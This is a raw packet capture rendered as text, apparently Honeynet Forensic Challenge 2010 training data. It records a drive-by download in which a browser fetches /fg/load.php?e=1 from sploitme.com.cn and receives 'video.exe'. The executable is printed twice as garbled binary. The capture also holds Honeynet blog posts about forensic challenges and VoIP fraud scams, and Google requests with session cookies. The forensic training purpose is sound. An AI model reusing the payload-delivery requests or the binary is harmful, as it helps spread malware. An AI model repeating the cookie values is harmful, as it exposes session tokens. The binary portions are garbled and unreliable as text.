Referer: http://sploitme.com.cn/fg/show.php?s=3feb5a6b2f Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Host: sploitme.com.cn Connection: Keep-Alive F;=K66' RT5E(@t84 P9 T3 PJF;=K' RT5E@o84 P9 T3 PHTTP/1.1 200 OK Date: Tue, 02 Feb 2010 19:05:44 GMT Server: Apache/2.2.9 (Ubuntu) PHP/5.2.6-2ubuntu4.6 with Suhosin-Patch X-Powered-By: PHP/5.2.6-2ubuntu4.6 Cache-Control: no-cache, must-revalidate Expires: Sat, 26 Jul 1997 05:00:00 GMT Accept-Ranges: bytes Content-Length: 12288 Content-Disposition: inline; filename=video.exe Keep-Alive: timeout=15, max=98 Connection: Keep-Alive Content-Type: application/octet-stream MZ@ !L!This program cannot be run in DOS mode. 
$PEL 1Ҁ …tLtt8EAEAQ P@AA fAB AJ ]ÍvU1D$ 1D$E D$E$Ív'US]u[]$>D$$[]ÍUU EBEBEBJB P@B fBA BQ ]É'U1D$ 1D$E D$E$Ív'U$D$E$Í'US]tmtgP@J z t'9X t`H@uzJB 9t*BJt?Bu9Z uӋSZ[]Z1[]ÉӋRC $ËSt&'U]G&UEuÉ$EN&'U1ɉE p@t[FtUBt*)‰Ѓ;EtEUGEt&u,FtEtBt@B뗃[^_]Í&U؍ED$F$w HE띸E듍v'UWVSE@E‹U>E p@FtUBt*)‰Ѓ;EtEUGEF;=K ' RT5E#@o84 P9 T3 P.t&uV҉UN MtE)9saU؍ED$F$$ٍUT$1҉w) HU9M1[^_]ø UWVS|UPEu0@ EM̅hu1U9VMԋI Eq9uMus{t&'}uE|_)؃`U؉UT$W$‰$ML$1҉E9Euu9ur1|[^_]ÍMԋY uЉ4$Eu̓uY 3t$&'EcE̋3uMԋE̋Q  ‰ ;EQM̅E̍$rE{@$XEt@UBhZ t$UEuE E@E@u@E @tE@@U҉UUM1ۡP@MQωMp9ӉUr%t&EtCw;]P@9t݋D$UDD$Mԉ $UȅyUM)Ћ4M9EoFuu UB%uJJ 1ҋyM9u :\Cs 9E9ًuԋV E*U؉؋R UUNEMEq9u]؃E 9um]M܋U|L$G$UE$U؉T$E1E9ErU9EqC]롍&;EQ9 EԋMЋP $|[^_]ËuԉVu9pUMUM111;Ms*'uċtuDCDB;]rߋEuPUĉJMVA;EuE$UȋEUuzUtY^MOLM(ED$DD$Uԉ$Uȅ~D;KDuԋM;LuUMBF;=KU ' RT5E$@o84 P9 4T3 PFMu4$MԋUA IQ uDuCDA;]+MԍUA $E$UȋE량uvUW1VS P@sE9vu&s FUC 5P@NjCStm9rfP@u1F2tFU FBF%Fu^؉yU T$W$‰0 [^_]ËF2WFU FBF%FtW)Ѓx둉‰m^P@UP@]HU8STT$U1ۉT$$L u=Jx|Au Jy;$u؋]$@@@@T$D$ $A@@@\$L$&'UWVS P@te[^_]EAAAA@@uEAAAAEAAAAEȡ@@EAAAAEAAAAE̡@@EAAAAEAAAAEС@@EAAAAEԡ@@Eء@@E܉4$_d$$Njd $`P@C+@C@(@CtP@pP@S C&'!ȃ$ AhJy硠@@E@@E@@E@@E@@E@@Eh$yuA1҅u$4$iÉP@CP@CP@e[^_]É9؉u Q=r -) ̋@%\a@%ta@%|a@%la@%a@%pa@%a@%ha@%a@%a@%a@%a@%a@%a@%xa@%a@%La@% a@%4a@%(a@%Pa@F;=K$<<RT5' E('@ 849PT3 size == sizeof(W32_EH_SHARED)/opt/local/var/macports/build/_opt_local_var_macports_sources_rsync.macports.org_release_ports_cross_i386-mingw32-gcc/work/gcc-3.4.5-20060117-1/gcc/config/i386/w32-shared-ptr.cGetAtomNameA (atom, s, sizeof(s)) != 0| @@F;=K*%' RT5E&@o 84 P9 T3 PgAB D4@"AB LP@AB Fl@oAB F!@}AB F'@(AB AGh`da`d\a`ldhaa|daaaaaabb(b__p__fmodeP__set_app_typeo_asserty_cexit_iob^_onexit_setmodeabortatexit?freermallocsignalsprintfstrF;=K\%' RT5E'@pc84 P9 DT3 PlenstrncmpMessageBoxA````````````````KERNEL32.dll`msvcrt.dll(`(`(`(`(`(`(`(`(`(`(`(`(`(`(`(`(`msvcrt.dll<`USER32.dllurlRetriever|http://www.honeynet.orgF;=K&<<RT5' E((@ 849PT3 P9 F;=K'<<RT5' E()@ 849PT3 P-F;=K,<<RT5' E(*@ 849PT3 DP-F;=K0<<RT5' E(+@ 849PT3 P F;=KHlJJRT5' E<,@ 849PT3 PΥGET /fg/load.php?e=1 HTTP/1.1 
Accept: */* Accept-Language: en-us Referer: http://sploitme.com.cn/fg/show.php?s=3feb5a6b2f Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Host: sploitme.com.cn Connection: Keep-Alive F;=Km66' RT5E((@t84 P9 T44PF;=KV' RT5E)@o84 P9 T44PHTTP/1.1 200 OK Date: Tue, 02 Feb 2010 19:05:44 GMT Server: Apache/2.2.9 (Ubuntu) PHP/5.2.6-2ubuntu4.6 with Suhosin-Patch X-Powered-By: PHP/5.2.6-2ubuntu4.6 Cache-Control: no-cache, must-revalidate Expires: Sat, 26 Jul 1997 05:00:00 GMT Accept-Ranges: bytes Content-Length: 12288 Content-Disposition: inline; filename=video.exe Keep-Alive: timeout=15, max=97 Connection: Keep-Alive Content-Type: application/octet-stream MZ@ !L!This program cannot be run in DOS mode. $PEL 1Ҁ …tLtt8EAEAQ P@AA fAB AJ ]ÍvU1D$ 1D$E D$E$Ív'US]u[]$>D$$[]ÍUU EBEBEBJB P@B fBA BQ ]É'U1D$ 1D$E D$E$Ív'U$D$E$Í'US]tmtgP@J z t'9X t`H@uzJB 9t*BJt?Bu9Z uӋSZ[]Z1[]ÉӋRC $ËSt&'U]G&UEuÉ$EN&'U1ɉE p@t[FtUBt*)‰Ѓ;EtEUGEt&u,FtEtBt@B뗃[^_]Í&U؍ED$F$w HE띸E듍v'UWVSE@E‹U>E p@FtUBt*)‰Ѓ;EtEUGEF;=K' RT5E-@o84 P9 ?T44Pt&uV҉UN MtE)9saU؍ED$F$$ٍUT$1҉w) HU9M1[^_]ø UWVS|UPEu0@ EM̅hu1U9VMԋI Eq9uMus{t&'}uE|_)؃`U؉UT$W$‰$ML$1҉E9Euu9ur1|[^_]ÍMԋY uЉ4$Eu̓uY 3t$&'EcE̋3uMԋE̋Q  ‰ ;EQM̅E̍$rE{@$XEt@UBhZ t$UEuE E@E@u@E @tE@@U҉UUM1ۡP@MQωMp9ӉUr%t&EtCw;]P@9t݋D$UDD$Mԉ $UȅyUM)Ћ4M9EoFuu UB%uJJ 1ҋyM9u :\Cs 9E9ًuԋV E*U؉؋R UUNEMEq9u]؃E 9um]M܋U|L$G$UE$U؉T$E1E9ErU9EqC]롍&;EQ9 EԋMЋP $|[^_]ËuԉVu9pUMUM111;Ms*'uċtuDCDB;]rߋEuPUĉJMVA;EuE$UȋEUuzUtY^MOLM(ED$DD$Uԉ$Uȅ~D;KDuԋM;LuUMBF;=K<<RT5' E(.@ 849PT44 PF;=Kn' RT5E.@o84 P9 T44PFMu4$MԋUA IQ uDuCDA;]+MԍUA $E$UȋE량uvUW1VS P@sE9vu&s FUC 5P@NjCStm9rfP@u1F2tFU FBF%Fu^؉yU T$W$‰0 [^_]ËF2WFU FBF%FtW)Ѓx둉‰m^P@UP@]HU8STT$U1ۉT$$L u=Jx|Au Jy;$u؋]$@@@@T$D$ $A@@@\$L$&'UWVS P@te[^_]EAAAA@@uEAAAAEAAAAEȡ@@EAAAAEAAAAE̡@@EAAAAEAAAAEС@@EAAAAEԡ@@Eء@@E܉4$_d$$Njd $`P@C+@C@(@CtP@pP@S C&'!ȃ$ AhJy硠@@E@@E@@E@@E@@E@@Eh$yuA1҅u$4$iÉP@CP@CP@e[^_]É9؉u Q=r -) ̋@%\a@%ta@%|a@%la@%a@%pa@%a@%ha@%a@%a@%a@%a@%a@%a@%xa@%a@%La@% a@%4a@%(a@%Pa@F;=K' RT5E/@o84 P9 
&T44P%a@%Da@%Ha@%a@%size == sizeof(W32_EH_SHARED)/opt/local/var/macports/build/_opt_local_var_macports_sources_rsync.macports.org_release_ports_cross_i386-mingw32-gcc/work/gcc-3.4.5-20060117-1/gcc/config/i386/w32-shared-ptr.cGetAtomNameA (atom, s, sizeof(s)) != 0| @@F;=K' RT5E0@o84 P9 ,CT44PAB D4@"AB LP@AB Fl@oAB F!@}AB F'@(AB AGh`da`d\a`ldhaa|daaaaaabb(b__p__fmodeP__set_app_typeo_asserty_cexit_iob^_onexit_setmodeabortatexit?freermallocsigF;=K' RT5E1@pA84 P9 1T44P+nalsprintfstrlenstrncmpMessageBoxA````````````````KERNEL32.dll`msvcrt.dll(`(`(`(`(`(`(`(`(`(`(`(`(`(`(`(`(`msvcrt.dll<`USER32.dllurlRetriever|http://www.honeynet.orgF;=K<<<RT5' E(/@ 849PT44 ?PEF;=K^<<RT5' E(0@ 849PT44 &PF;=K<<RT5' E(1@ 849PT44 1PF;=K!<<RT5' E(2@ 849PT44 6RPDF;=Knn' E`3M  Lm_2( DIEGEEDBDCEFEEEEDCEEEDDBDEDGDCCA   F;=KOnn' E`4L  L]3( FHEPFCELEHFCEPFFFACACACACACACABO   G;=K6' E5  x4  DIEGEEDBDCEFEEEEDCEEEDDBDEDGDCAA FHEPFCELEHFCEPFFFACACACACACACABNSMB%V#\MAILSLOT\BROWSE8FD12EDD2DC1462G;=KB' E6  J5  DIEGEEDBDCEFEEEEDCEEEDDBDEDGDCCA FHEPFCELEHFCEPFFFACACACACACACABNSMB%!!V2\MAILSLOT\BROWSE8FD12EDD2DC1462UH;=KLLRT5' E>?i 5*匥wwwhoneynetorgH;=K) ' EB  x7  DIEGEEDBDCEFEEEEDCEEEDDBDEDGDCAA FHEPFCELEHFCEPFFFACACACACACACABNSMB%V#\MAILSLOT\BROWSE8FD12EDD2DC1462I;=KLLRT5' E>Ci 5*匥wwwhoneynetorgI;=KS\\' RT5EN2@ 5:3wwwhoneynetorg @rI;=K&j>>RT5' E0D@8 @r=Pp>GI;=K::' RT5E,3@@r P=`I;=K<<RT5' E(F@8 @r=PPI;=KRT5' EG@6 @r=PP GET / HTTP/1.1 Accept: */* Accept-Language: en-us Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Host: www.honeynet.org Connection: Keep-Alive Cookie: SESS0f916077214db25d3c25b38417a57722=c3c14637ee4fa2f3ced7dfe9b7f77eb9; __utma=121888786.1305690527.1264085162.1265128880.1265128952.4; __utmz=121888786.1264085162.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none) I;=K66' RT5E(4@@r P=qP,I;=K ' RT5E5@@r P=qPHTTP/1.1 200 OK Date: Tue, 02 Feb 2010 19:05:48 GMT Server: Apache X-Powered-By: PHP/4.3.9 Expires: Sun, 19 Nov 1978 05:00:00 GMT 
Last-Modified: Tue, 02 Feb 2010 19:05:48 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8 6c34 Honeynet Project Blog | The Honeynet Project
To learn the tools, tactics and motives involved in computer and network attacks, and share the lessons learned.

Honeynet Project Blog

First challenge of the Forensic Challenge 2010 has been posted.

Main blog - Mon, 01/18/2010 - 07:21
We have just posted the first challenge of the Forensic Challenge 2010. The first challenge deals with a network attack. It has been provided by Tillmann Werner from the Giraffe Chapter. It is accessible at https://honeynet.org/node/504. Submissions are due on Monday, February 1st 2010 and results will be released on Monday, February 15th 2010. The top three submissions will be awarded with small prizes. Check it out!

Challenge 1 of the Forensic Challenge 2010 - pcap attack trace

Main blog - Mon, 01/18/2010 - 06:18
Forensic Challenge 2010 Challenge 1 - pcap attack trace - (provided by Tillmann Werner from the Giraffe Chapter) is to investigate a network attack.

Send submissions (please use the MS word submission template or the Open Office submission template) forensicchallenge2010@honeynet.org no later then 17:00 EST, Monday, February 1st 2010. Results will be released on Monday, February 15th 2010. Small prizes will be awarded to the top three submissions.


Skill Level: Intermediate

The Challenge:

A network trace with attack data is provided. (Note that the IP address of the victim has been changed to hide the true location.) Analyze and answer the following questions:

  1. Which systems (i.e. IP addresses) are involved? (2pts)
  2. What can you find out about the attacking host (e.g., where is it located)? (2pts)
  3. How many TCP sessions are contained in theJ;=K]' RT5E:@@r P="qP| dump file? (2pts)
  4. How long did it take to perform the attack? (2pts)
  5. Which operating system was targeted by the attack? And which service? Which vulnerability? (6pts)
  6. Can you sketch an overview of the general actions performed by the attacker? (6pts)
  7. What specific vulnerability was attacked? (2pts)
  8. What actions does the shellcode perform? Pls list the shellcode. (8pts)
  9. Do you think a Honeypot was used to pose as a vulnerable victim? Why? (6pts)
  10. Was there malware involved? Whats the name of the malware? (We are not looking for a detailed malware analysis for this challenge) (2pts)
  11. Do you think this is a manual or an automated attack? Why? (2pts)
Download:
attack-trace.pcap_.gz Sha1: 0f5ddab19034b2656ec316875b527d9bff1f035f

Announcing the Honeynet Project Forensic Challenge 2010

Main blog - Tue, 01/12/2010 - 17:34

I am very happy to announce the Honeynet Project Forensic Challenge 2010. The purpose of the Forensic Challenges is to take learning one step farther. Instead of having the Honeynet Project analyze attacks and share their findings, Forensic Challenges give the security community the opportunity to analyze attacks and share their findings. In the end, individuals and organizations not only learn about threats, but also learn how to analyze them. Even better, individuals can access the write-ups from other individuals, and learn about new tools and techniques for analyzing attacks. Best of all, the attacks of the Forensic Challenge are attacks encountered in the wild, real hacks, provided by our members.


It has been several years since we provided Forensic Challenges and with the Forensic Challenge 2010, we will provide desperately needed upgrades. The Forensic Challenge 2010 will include a mixture of server-side attacks on the latest operating systems and services, attacks on client-side attacks that emerged in the past few years, attacks on VoiP systems, web applications, etc. At the end of challenge, we will provide a sample solution created by our members using the state-of-the-art tools that are publicly available, such as libemu and dionaea.


The first challenge (of sJ;=K' RT5E<@@r P=bqPWeveral for 2010) will be posted on our Forensic Challenges web site on Monday, January 18th 2010. We will be open to submissions for about two weeks and announce the winners by February 15th 2010. This year, we will also award the top three submissions with prizes! Please check the web site on Monday, January 18th 2010 for further details...



Christian Seifert

Chief Communications Officer
The Honeynet Project

Italian Chapter updates

Main blog - Wed, 12/16/2009 - 09:41
Folks, I would like to inform you all about the recent activities we have been working on. First of all, we have totally rebuilt our web site. The new one aims to be a central repository of all the (external/internal) news concerning botnets (mainly) and malware (secondary). We will use the blog for posting about our project developments, and for commenting on/reporting interesting news concerning the field that we are currently covering, so you can now add a new entry to your feed reader :)

VOIP phoneynet : PART 3 "WHAT WOULD CROOKS DO WITH A COMPROMISED VOIP GATEWAY ANYWAY?"

Australian Blog - Sat, 12/05/2009 - 13:55

There are quite a few ways that a criminal can make use of a compromised VOIP server. It's important to realize that the criminal mind is very imaginative, and there will be many motives and scams that we have not even imagined yet, much less experienced.
When looking at these types of questions, I think it helps to have the notion of motive in the back of your mind. This may sound obvious, but I find this helps answer the question 'what would a person or group with this motivation want with a compromised VOIP system?'.

Here are some potential motives. While I won't go into every possible scenario, it's really not hard to imagine that full control of a target's phone system would be handy for people with any of these motives.

  • Financial gain
  • Political
  • Religious
  • Reputation and ego of the hacker
  • Intellectual Property theft, Trade Secrets
  • Espionage
  • Retribution, commercial or personal
  • Vandalist, miscreant activity (bored youth..)
  • I got some great local and international feedback on incidents from readers of Part 1 and Part 2 of this blog series (Thank you everyone). Most of these incidents seem to fall into the 'Financial gain' motive group, so I'll give two examples of common attacks which are currently seen in AU and overseas, and a possible future threat.

    Cheap overseas calls / calling cards.
    One of the most common uses for hacked VOIP servers is to simply make unauthorized calls, and there have been incidents of hacked VOIP servers being used in relation to calling card scams to do just this. This is not to say that all cheap calling cards operations are scams, most I'm sure are legitimate.
    Here is a brief overview of a simple version of the scam:

  • The crook controls a hacked VOIP system in (say) Australia. This means that they can accept and redirect calls, and essentially control every aspect of that phone system.
  • The crook sells 'calling cards' to citizens of another country that live in, or are visiting Australia. The card allows them to call home at ridiculously cheap rates, a tiny fraction of the cost of a legitimate overseas call.
  • The buyer of the calling card is instructed to call a local (probably legitimate) number in Australia and then enter in the international number they are trying to reach. The crook then reroutes these calls through VOIP to the hacked system, which then makes the international call. This functionality could potentially be turned off periodically to evade being uncovered, and could even be configured to only use the hacked VOIP server for calls to a specific set of countries.
  • The buyer of the calling card of course could not be aware that the call was routed through a hacked VOIP system, they are just happy to have spoken to family and friends at a cheap rate.
  • Note also that it is entirely possible for the calls to be re-routed through an entire chain of hacked VOIP servers in 2, 3 or more different countries, effectively 'laundering the call' by making it harder to track down if an investigation is ever launched. Jurisdictional/timezone/culture and language differences are some of the most challenging hurdles faced by cybercrime investigators, and the crooks know how to take advantage of this (I aim to explore these aspects in a later instalment of this blog series)
  • The important thing is that the calling card holder just got an overseas call for the cost of a local call, plus the crook's margin, so they are not really the victim. The owner of the hacked VOIP server however may (or may not, depending on the size of a normal bill) realize that something is amiss when they get their next phone bill, as it was their system that made the calls. We have heard a few stories of this occurring (in Australia and abroad), where the victim's telephone bill inexplicably sky-rocketed by over $20,000 in one case here in Australia!

    Premium rate number calling
    This attack predates VOIP by many years, first being used on standard corporate PABX systems. VOIP has made this much more lucrative for the crooks due to the call volumes it allows.

    The scam is fairly simple.

  • Crook has control of hacked VOIP system(s) for which the victim gets bills for on a monthly basis. This VOIP system may belong to a corporate entity, and so may be capable of making many concurrent calls.
  • The crook has a premium rate 1900 number, for which they collect revenue on a weekly or daily basis.
  • Crook gets the hacked VOIP system to make multiple, repeated calls to the 1900 number, thus adding to the account of the 1900 number, at the expense of the owner of the hacked VOIP system.
  • Crook collects the revenue from the 1900 number every day/week until someone notices.
  • In this case, the victim may not realise they have been hacked until they receive the bill at the end of the month, by which time the crook has made off with potentially hundreds of thousands of dollars over at least 2 weekly collection periods.
    Note also that there is a money trail here, so the crook must also engage in other crime types such as identity theft, money laundering etc to actually get cash out.

    Future threat – Denial of Service
    The motive behind this attack could probably be any of the ones listed above.
    I've not heard of any instances of this, but it's worthwhile considering how we would deal with the threat of Denial of Service on voice systems. This could be as simple as an attacker using a hacked VOIP system to dial multiple concurrent calls into a target's phone numbers (VOIP, or PSTN for that matter), which would exhaust all of the available connections, even ISDN/PSTN indials. Remember that SIP, the predominant VOIP signalling protocol, is typically carried over UDP (connectionless), so as an Internet protocol its source addresses can be spoofed; a hacked VOIP system might not even be required to effect a DoS.
    This area needs much more research and consideration from authorities much better funded and capable than us, and yes, we are more than happy to brainstorm ideas on threat scenarios and mitigations with the appropriate agencies/researchers, just contact us.

    Given the importance of voice systems both for commerce and its use in emergency situations, it's imperative that threat scenarios are identified and risks are mitigated to within acceptable tolerances. I hope this blog gives some background info to organizations who are starting to consider the threats they face, and put in place appropriate controls and response plans.

    Next in the blog series is PART 4 "HOW BEST TO PROTECT AGAINST VOIP THREATS". Feel free to contact me at ben@honeynet.org.au with any feedback, or input into the next one.

    Nepenthes Pharm

    Main blog - Sun, 11/29/2009 - 18:32
    Parvinder Bhasin asked us to post an announcement about his new tool. While not officially a tool developed by the Honeynet Project, we thought you should know about some of the great work he is doing. Nepenthes PHARM is a perfect companion to your Nepenthes honeypot installations. PHARM is an Open Source client/server and web portal package, which provides central reporting and analysis of your distributed Nepenthes based honeypots.

    Know Your Tools: use Picviz to find attacks

    Main blog - Thu, 11/26/2009 - 17:27
    We are very excited to announce the publication of our first paper in the new Know Your Tools paper series: “KYT: use Picviz to find attacks” authored by Sebastien Tricaud from the French Chapter and Victor Amaducci from the University of Campinas.

    The paper can be downloaded at Know Your Tools: use Picviz to find attacks.

    Paper Abstract
    Picviz is a parallel coordinates plotter which enables easy scripting from various input (tcpdump, syslog, iptables logs, apache logs, etc..) to visualize data and discover interesting aspects of that data quickly. Picviz uncovers previously hidden data that is difficult to identify with traditional analysis methods.

    In the first paper of our new Know Your Tools series, Sebastien Tricaud from the French Honeynet Project Chapter and Victor Amaducci from the University of Campinas, focus on Picviz. After a brief overview on parallel coordinates, Picviz architecture, and installation procedure, three real-world examples are presented that illustrate how to identify attacks from large amounts of data: Picviz is used to analyze SSH logs, Apache access logs and network traffic. With these examples, it is demonstrated how Picviz can find attacks that previously have been hidden.


    Recent additions to the Picviz GUI have been made by Victor Amaducci under the mentorship of Sebastien Tricaud as part of the Google Summer of Code program 2009. The most recent version of Picviz is freely available for download from its project site at http://www.wallinfire.net/picviz and support can be sought from the Picviz mailing list at http://www.wallinfire.net/cgi-bin/mailman/listinfo/picviz.

    RE-Google in action - screenshot

    Main blog - Sun, 11/15/2009 - 22:49

    RE-Google in action - screenshot

    Main blog - Sun, 11/15/2009 - 22:34

    RE-Google Architecture

    Main blog - Sun, 11/15/2009 - 22:31

    RE-Google - or how Grandma started Reverse Engineering

    Main blog - Sun, 11/15/2009 - 22:20
    Some people say "Reverse Engineering is an art". Well, this might be true if you consider stuff like mathematics as art. It is more an application of standard methods that evolve constantly. Actually, everybody can learn these methods and start to RE executables. With the RE-Google plugin for IDA Pro, even your granny can start reversing :)

    Glastopf

    Main blog - Sat, 10/17/2009 - 19:19
    Web sites are hacked all the time. Web application, database, and cross-site scripting vulnerabilities expose a large attack surface that can be exploited to, among other things, deface the web site, send spam, turn the web site into a bot, and serve drive-by-download attacks. Glastopf is a low-interaction honeypot that emulates a vulnerable web server hosting many web pages and web applications with thousands of vulnerabilities. Glastopf is easy to set up and once indexed by search engines, attacks will pour in by the thousands daily. Glastopf has been developed as part of the 2009 Google Summer of Code by student Lukas Rist (and mentored by Thorsten Holz of the German Honeynet Project Chapter). It can be downloaded from the Glastopf trac site at http://trac.glastopf.org/trac. More information on Glastopf can be found on the project site at http://glastopf.org/.
    0 J;=K}66' RT5E(I@@r P=qPnJ;=K݁<<RT5' E(W@8} @r=PqPs FHEPFJ;=K<<RT5' E(X@8| @r=PqPs DIEGEJ;=K<<RT5' E(Y@8{ @r=PqPs FHEPFJ;=Kp66' RT5E(J@@r P=rPnJ;=Kt TTRT5' EFZi 52ujwwwgoogle-analyticscomJ;=KR ' RT5EK@H 5Nwwwgoogle-analyticscom  2 www-google-analyticslgoogle!6J}Me6J}Md6J}MfJ;=K>>RT5' E0[@S| J}Me>PrRp0J;=Kw;::' RT5E,L@ՏJ}Me P>vrR`J;=K@<<RT5' E(]@S J}Me>PrRvPK;=K RT5' E^@P J}Me>PrRvPZWGET /__utm.gif?utmwv=4.6.5&utmn=1731245256&utmhn=www.honeynet.org&utmcs=utf-8&utmsr=1088x729&utmsc=32-bit&utmul=en-us&utmje=1&utmfl=6.0%20r79&utmdt=Honeynet%20Project%20Blog%20%7C%20The%20Honeynet%20Project&utmhid=2130591288&utmr=-&utmp=%2F&utmac=UA-372404-7&utmcc=__utma%3D121888786.1305690527.1264085162.1265128952.1265310286.5%3B%2B__utmz%3D121888786.1264085162.1.1.utmcsr%3D(direct)%7Cutmccn%3D(direct)%7Cutmcmd%3D(none)%3B HTTP/1.1 Accept: */* Referer: http://www.honeynet.org/ Accept-Language: en-us Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Host: www.google-analytics.com Connection: Keep-Alive K;=K 66' RT5E(M@ՒJ}Me P>vrUPK;=KIpp' RT5EbN@WJ}Me P>vrUPrHTTP/1.1 200 OK Date: Tue, 02 Feb 2010 19:05:06 GMT Content-Length: 35 Pragma: no-cache Expires: Wed, 19 Apr 2000 11:43:43 GMT Last-Modified: Wed, 21 Jan 2004 19:50:30 GMT Content-Type: image/gif Server: Golfe Cache-Control: private, no-cache, no-cache=Set-Cookie, proxy-revalidate X-XSS-Protection: 0 K;=K>IYY' RT5EKO@mJ}Me P>wPrUw_P.K;=KW ' Ea  x9  DIEGEEDBDCEFEEEEDCEEEDDBDEDGDCAA FHEPFCELEHFCEPFFFACACACACACACABNSMB%V#\MAILSLOT\BROWSE8FD12EDD2DC1462M;=K' Eb  ):  DIEGEEDBDCEFEEEEDCEEEDDBDEDGDCAA FHEPFCELEHFCEPFFFACACACACACACABOSMB%V/\MAILSLOT\BROWSE #8FD12EDD2DC1462N;=K8' Ec  );  DIEGEEDBDCEFEEEEDCEEEDDBDEDGDCAA FHEPFCELEHFCEPFFFACACACACACACABOSMB%V/\MAILSLOT\BROWSE #8FD12EDD2DC1462N;=K(>>RT5' E0d@8h @r?Pp?.O;=K::' RT5E,P@@r P?F`O;=K' Ef  )<  DIEGEEDBDCEFEEEEDCEEEDDBDEDGDCAA FHEPFCELEHFCEPFFFACACACACACACABOSMB%V/\MAILSLOT\BROWSE #8FD12EDD2DC1462P;=Ku' Eg  )=  
DIEGEEDBDCEFEEEEDCEEEDDBDEDGDCAA FHEPFCELEHFCEPFFFACACACACACACABOSMB%V/\MAILSLOT\BROWSE #8FD12EDD2DC1462Q;=Krnn' E`h  LWS>) FHEPFCELEHFCEPFFFACACACACACACABN   R;=KMnn' E`i  LWS>) FHEPFCELEHFCEPFFFACACACACACACABN   R;=K nn' E`j  LWS>) FHEPFCELEHFCEPFFFACACACACACACABN   S;=Knn' E`k  LXS>( FHEPFCELEHFCEPFFFACACACACACACABN   S;=K66' RT5E(Q@t82 P: OyQaP*S;=Kߪ<<RT5' E(l@z 82:PyQa PPS;=K66' RT5E(R@t82 P8 ˎa3|PS;=K<<RT5' E(m@y 828Pa3| P~ 1GET /fT;=Ks1nn' E`n  LO?) ABACFPFPENFDECFCEPFHFDEFFPFPACAB   U;=K#nnn' E`o  LO?) ABACFPFPENFDECFCEPFHFDEFFPFPACAB   U;=K66' RT5E(S@t84 P9 6RT44P!U;=K<<RT5' E(p@t 849PT44 6SPC DIEGEU;=K<<RT5' E(q@s 849PT44 6SP FHEPFU;=K><<RT5' E(r@t 82:PyQa PP&U;=K`<<RT5' E(s@s 828Pa3| PU;=K nn' E`t  LO?) ABACFPFPENFDECFCEPFHFDEFFPFPACAB   V;=K*}JJRT5' E<ui 5((\uwwwgooglecomV;=K͆' RT5ET@' 5=1uwwwgooglecom Zwwwlgooglecom,TUj,TUi,TU,TUg,TUh,TUcV;=Kԫ>>RT5' E0v@6 Uj@PpwV;=K::' RT5E,U@Uj P@)`PV;=KE<<RT5' E(x@6 Uj@P)P DIEGEV;=KAART5' E3y@4} Uj@P)P(GET / HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */* Accept-Language: en-us Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Host: www.google.com Connection: Keep-Alive Cookie: PREF=ID=e2d48468f4ba6ce0:U=5da8c791fa19cf9b:TM=1264084848:LM=1264769133:S=8DOC33xwBrhLOdd9; NID=31=gYIZZKrPrEnQ1GYhiB-CQkP4PXCYoqG-A6R1xD8Xx7pYFlkBnr7DS6ygKCv2RSHIEenNnTMs0jtMSkOKV35Ntc0AqBPNzW7UIQ1F7Tx7KV7PBe--KezKMunqahAaUKqV V;=Kή66' RT5E(V@Uj P@)PV;=K' RT5EW@Uj P@)PHTTP/1.1 302 Found Location: http://www.google.fr/ Cache-Control: private Content-Type: text/html; charset=UTF-8 Date: Tue, 02 Feb 2010 19:06:00 GMT Server: gws Content-Length: 218 X-XSS-Protection: 0 302 Moved

    302 Moved

    The document has moved here. V;=KsIIRT5' E;{i 5'%^wwwgooglefrV;=KQ' RT5EX@ 5I=ਁwwwgooglefr 'wwwgooglecom+ZwwwlgooglecomGTUcGTUjGTUiGTUGTUgGTUhV;=K >>RT5' E0|@6 UcAPvpbV;=K::' RT5E,Y@Uc PA*v`V;=K<<RT5' E(~@6 UcAPv*PV;=Kc@@RT5' E2@4 UcAPv*PhGET / HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */* Accept-Language: en-us Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Cookie: PREF=ID=e2e4041cfce38490:U=d268ee4913870d14:TM=1264084848:LM=1264769134:S=idyeS_ZtlvevQq-B; NID=31=jTf84Bsx_VBZ3zZESENLEMM0EN5d01u_AF2pZK0EIKTFpo4RLNSPmrGdelxrx6WlfXI0OdM0UwqYMdwIS7T4AXzWq7dXkxmQjKFPsc8VCV9JwME0Xzblz3XlEbYWwfzn Connection: Keep-Alive Host: www.google.fr V;=K66' RT5E(Z@Uc PA*vPV;=KG<<RT5' E(@6 Uj@P)PCV;=K4h' RT5E[@#Uc PA*vPHTTP/1.1 200 OK Date: Tue, 02 Feb 2010 19:06:00 GMT Expires: -1 Cache-Control: private, max-age=0 Content-Type: text/html; charset=UTF-8 Content-Encoding: gzip Server: gws Content-Length: 4585 X-XSS-Protection: 0 ZVۺߧp/5)PZZ.@ӝ!۲-ҌgX/d;q 0Zۺ}7M)eYlcc˟ݽ3,Ổ يBCVe)/2塄bf|<=FGQxu$Fc:<8;Zo-Ttk ۭ]R[<76.=L0y~&|fIGvYe$' -FL$x,G +%*3ՏEWSUKP"!w?UldP]k:EtE!N(1ӏ}!3JQ">fXr:ft˰~.;4H孛r8y݆{HИ 9!F_O: 2|3WK*hhclz/7pSFg c)C 묔d2]W$D~BAB2-C҄ kaގ}Ï`HR/DSi4D/K?uYщS5FPhMMUs):֫]Q0eUT*h 0jJu֏ƫ|+ ?,\h^vb*,+= 83T9_Y8~]Es7s. fRVFCY*r=& =Ik&:"kHښ>s$(qIX3#Ƣj3'*UƪMM5ğtPBR qfnE~t޴,]t vW46Lc# vb KI (S|pM ARsహ *l5 b (dلѸ3">2yqML b;@m ]ӃMNxOl鍵ko;͒ind ac6`1i6o9OLMd $JCqӴD.FA`M:m5 Y.Xp/,JƎĭ)v ” r 